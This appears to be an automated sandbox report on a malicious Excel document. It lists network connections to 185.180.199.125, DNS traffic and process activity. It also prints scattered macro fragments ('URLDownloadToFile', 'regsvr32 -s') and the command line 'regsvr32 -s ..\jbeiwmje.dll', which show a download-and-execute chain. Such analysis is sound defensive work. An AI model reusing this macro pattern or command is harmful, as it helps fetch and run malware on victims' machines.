,,,,,,,,,UR,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,LDownl,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,oa,,dToFile,,,,,,,,,,,,,,,,,,,,re,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,gs,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""vr32 -s """,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJC,,,,,,,,,,

                                                                                                                                                          Network Behavior

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jun 23, 2021 17:15:30.984347105 CEST4970680192.168.2.5185.180.199.125
                                                                                                                                                          Jun 23, 2021 17:15:33.997111082 CEST4970680192.168.2.5185.180.199.125
                                                                                                                                                          Jun 23, 2021 17:15:40.012763023 CEST4970680192.168.2.5185.180.199.125

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jun 23, 2021 17:15:14.943389893 CEST53537848.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:14.970345974 CEST6530753192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:15.022192955 CEST53653078.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:15.356061935 CEST6434453192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:15.405045033 CEST53643448.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:16.141031981 CEST6206053192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:16.187206030 CEST53620608.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:17.070789099 CEST6180553192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:17.134424925 CEST53618058.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:17.759660959 CEST5479553192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:17.817090988 CEST53547958.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:17.945167065 CEST4955753192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:18.006748915 CEST53495578.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:18.542877913 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:18.603586912 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:19.810698032 CEST6544753192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:19.866802931 CEST53654478.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:26.223021984 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:26.271197081 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:27.439392090 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:27.543859005 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:28.045419931 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:28.101428032 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:28.945795059 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:28.992137909 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:29.059870005 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:29.120651007 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:30.094038010 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:30.160067081 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:31.053740025 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:31.100752115 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:32.128967047 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:32.137104034 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:32.175362110 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:32.185007095 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:33.926362991 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:33.986044884 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:34.782288074 CEST5516153192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:34.830180883 CEST53551618.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:36.184318066 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:36.245748997 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:39.526983976 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:39.584592104 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:56.239686966 CEST4999253192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:56.295214891 CEST53499928.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:56.865720987 CEST6007553192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:56.880937099 CEST5501653192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:56.911847115 CEST53600758.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:56.935142040 CEST53550168.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:57.029663086 CEST6434553192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:57.084522963 CEST53643458.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:15:57.259488106 CEST5712853192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:15:57.328385115 CEST53571288.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:16:10.297866106 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:16:10.354854107 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:16:38.256072044 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:16:38.311969042 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:16:49.219997883 CEST5039453192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:16:49.294914007 CEST53503948.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:17:02.421690941 CEST5853053192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:17:02.477931976 CEST53585308.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:17:14.744090080 CEST5381353192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:17:14.826982975 CEST53538138.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:17:16.747375011 CEST6373253192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:17:16.808722973 CEST53637328.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:17:56.253246069 CEST5734453192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:17:56.400896072 CEST53573448.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:17:57.031517029 CEST5445053192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:17:57.086734056 CEST53544508.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:17:57.925662041 CEST5926153192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:17:57.986835957 CEST53592618.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:17:58.379069090 CEST5715153192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:17:58.438467026 CEST53571518.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:17:58.891773939 CEST5941353192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:17:58.952917099 CEST53594138.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:17:59.407521963 CEST6051653192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:17:59.465347052 CEST53605168.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:17:59.851337910 CEST5164953192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:17:59.999265909 CEST53516498.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:18:00.634860039 CEST6508653192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:18:00.701121092 CEST53650868.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:18:01.467159986 CEST5643253192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:18:01.523323059 CEST53564328.8.8.8192.168.2.5
                                                                                                                                                          Jun 23, 2021 17:18:01.902307987 CEST5292953192.168.2.58.8.8.8
                                                                                                                                                          Jun 23, 2021 17:18:01.954845905 CEST53529298.8.8.8192.168.2.5

                                                                                                                                                          Code Manipulations

                                                                                                                                                          Statistics

                                                                                                                                                          CPU Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Memory Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Start time:17:15:25
                                                                                                                                                          Start date:23/06/2021
                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                          Imagebase:0x50000
                                                                                                                                                          File size:27110184 bytes
                                                                                                                                                          MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:15:51
                                                                                                                                                          Start date:23/06/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:regsvr32 -s ..\jbeiwmje.dll
                                                                                                                                                          Imagebase:0x1220000
                                                                                                                                                          File size:20992 bytes
                                                                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Disassembly

                                                                                                                                                          Code Analysis

                                                                                                                                                          Reset < >